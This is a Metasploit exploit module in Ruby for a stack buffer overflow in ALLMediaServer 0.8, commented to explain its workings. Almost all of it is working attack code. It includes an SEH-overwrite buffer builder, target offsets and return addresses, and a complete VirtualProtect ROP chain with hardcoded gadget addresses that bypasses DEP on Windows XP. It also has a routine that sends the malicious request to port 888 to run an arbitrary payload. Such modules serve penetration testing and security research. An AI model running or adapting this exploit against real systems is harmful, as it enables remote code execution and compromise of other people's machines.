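##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# ALLMediaServer 0.8 stack buffer overflow (CVE-2017-17932 / EDB 19625).
#
# A single oversized HTTP request to the media server overwrites an SEH
# record.  Two delivery strategies are implemented, selected by target:
#
# * Windows XP SP3: SEH handler is a stack-pivot gadget (ADD ESP,6CC ...)
#   that lands in a mona-generated VirtualProtect ROP chain, which makes the
#   stack executable before jumping to the payload (DEP bypass).
# * Windows 7 SP1: plain POP/POP/RET SEH overwrite, no ROP. The description
#   explains why: the pivot is not reliable across VMs/physical hosts there,
#   and the server runs without DEP under the default OptIn policy anyway.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  # Address of a bare RETN gadget; chained copies act as a "ROP NOP" sled.
  ROP_NOP = 0x665a0aa1
  # Four x86 NOP (0x90) bytes packed into one little-endian dword.
  NOP_DWORD = 0x90909090

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ALLMediaServer 0.8 Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability
        is caused due to a boundary error within the handling of HTTP request.

        While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't
        reliable across virtual (VMWare, VirtualBox) and physical environments. Because of
        this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default
        DEP is OptIn and AllMediaServer won't run with DEP.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'motaz reda <motazkhodair[at]gmail.com>', # Original discovery
          'modpr0be <tom[at]spentera.com>',         # Metasploit module
          'juan vazquez'                            # More improvement
        ],
      'References'     =>
        [
          [ 'CVE', '2017-17932' ],
          [ 'OSVDB', '83889' ],
          [ 'EDB', '19625' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread', # none/process/thread/seh
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'    => "",
          # Space after the SEH record; payload is placed last in the buffer.
          'Space'       => 660,
          'DisableNops' => true
        },

      # Per-target layout constants (all byte offsets from the start of the
      # request buffer):
      #   Ret       - address written into the SEH handler slot
      #   OffsetRop - where the ROP chain starts (XP only)
      #   jmp       - displacement of the short jmp that follows the chain (XP only)
      #   Offset    - where the SEH record (nSEH/SEH) starts
      'Targets'        =>
        [
          [ 'ALLMediaServer 0.8 / Windows XP SP3 - English',
            {
              'Ret'       => 0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll
              'OffsetRop' => 696,
              'jmp'       => 264,
              'Offset'    => 1072
            }
          ],
          [ 'ALLMediaServer 0.8 / Windows 7 SP1 - English',
            {
              'Ret'       => 0x6ac5cc92, # ppr from avformat-53.dll
              'Offset'    => 1072
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-07-04',
      'DefaultTarget'  => 1))

    register_options([Opt::RPORT(888)])
  end

  # Returns +n+ copies of one random 32-bit value.  Used as filler for a
  # register the ROP chain pops but never reads (the POP EDI after PUSH EAX).
  def junk(n = 1)
    [rand_text_alpha(4).unpack('L')[0]] * n
  end

  # Returns +n+ dwords that advance execution without side effects: the
  # address of a RETN gadget when +rop+ is true, otherwise packed 0x90 NOPs.
  def nops(rop = false, n = 1)
    [rop ? ROP_NOP : NOP_DWORD] * n
  end

  # Assembles x86 +code+ into raw machine code using Metasm.
  def asm(code)
    Metasm::Shellcode.assemble(Metasm::Ia32.new, code).encode_string
  end

  # mona-generated VirtualProtect chain for the Windows XP SP3 target.
  #
  # The chain dereferences the IAT pointer to VirtualProtect into ESI, loads
  # the remaining registers in the usual PUSHAD layout (EBP = a "call esp"
  # gadget to return into the stack once it is executable, EBX = size 0x600,
  # EDX = 0x40 i.e. PAGE_EXECUTE_READWRITE, ECX = a writable dword for the
  # old-protection out parameter) and finally PUSHAD # RETN makes the call.
  #
  # All addresses are fixed, non-ASLR module addresses from the server's
  # bundled av*-53.dll libraries (see the target 'Ret' comments).
  def rop_chain
    [
      nops(true, 12), # ROP NOP sled
      0x65f6faa7,     # POP EAX # RETN
      0x671ee4e0,     # ptr to &VirtualProtect()
      0x6ac1ccb4,     # MOV EAX,DWORD PTR DS:[EAX] # RETN
      0x667ceedf,     # PUSH EAX # POP ESI # POP EDI # RETN
      junk,           # consumed by POP EDI
      0x65f5f09d,     # POP EBP # RETN
      0x65f9830d,     # & call esp
      0x6ac1c1d5,     # POP EBX # RETN
      0x00000600,     # 0x00000600 -> ebx (dwSize)
      0x6672a1e2,     # POP EDX # RETN
      0x00000040,     # 0x00000040 -> edx (flNewProtect)
      0x665a09df,     # POP ECX # RETN
      0x6ad58a3d,     # &Writable location (lpflOldProtect)
      0x6ac7a771,     # POP EDI # RETN
      nops(true),     # RETN (ROP NOP)
      0x6682f9f4,     # POP EAX # RETN
      nops,           # nop
      0x663dcbd2      # PUSHAD # RETN
    ].flatten.pack('V*')
  end

  # Windows 7 SP1 buffer: [junk][nSEH/SEH][payload].  No DEP bypass.
  def seh_only_buffer
    buffer = rand_text(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded
    buffer
  end

  # Windows XP SP3 buffer:
  #   [junk][ROP chain][short jmp][padding][nSEH/SEH][payload]
  # The SEH handler (a stack pivot) transfers control into the ROP chain;
  # the short jmp that follows the chain skips forward into the payload.
  def rop_seh_buffer
    buffer = rand_text(target['OffsetRop'])
    buffer << rop_chain
    buffer << asm("jmp $+0x#{target['jmp'].to_s(16)}") # jmp to payload

    # Defensive: a mis-edited target table would otherwise make the
    # padding length negative, silently producing a malformed buffer.
    if buffer.length > target['Offset']
      fail_with(Failure::BadConfig,
        "ROP chain and jmp stub (#{buffer.length} bytes) overrun the SEH offset (#{target['Offset']})")
    end

    buffer << rand_text(target['Offset'] - buffer.length)
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded
    buffer
  end

  # Opens the TCP connection, sends the malicious request and disconnects.
  # No check method exists; the module is fire-and-forget.
  def exploit
    connect

    buffer = if target.name.include?('Windows 7')
               seh_only_buffer
             else
               rop_seh_buffer
             end

    print_status("Sending payload to ALLMediaServer on #{target.name}...")
    sock.put(buffer)

    disconnect
  end
end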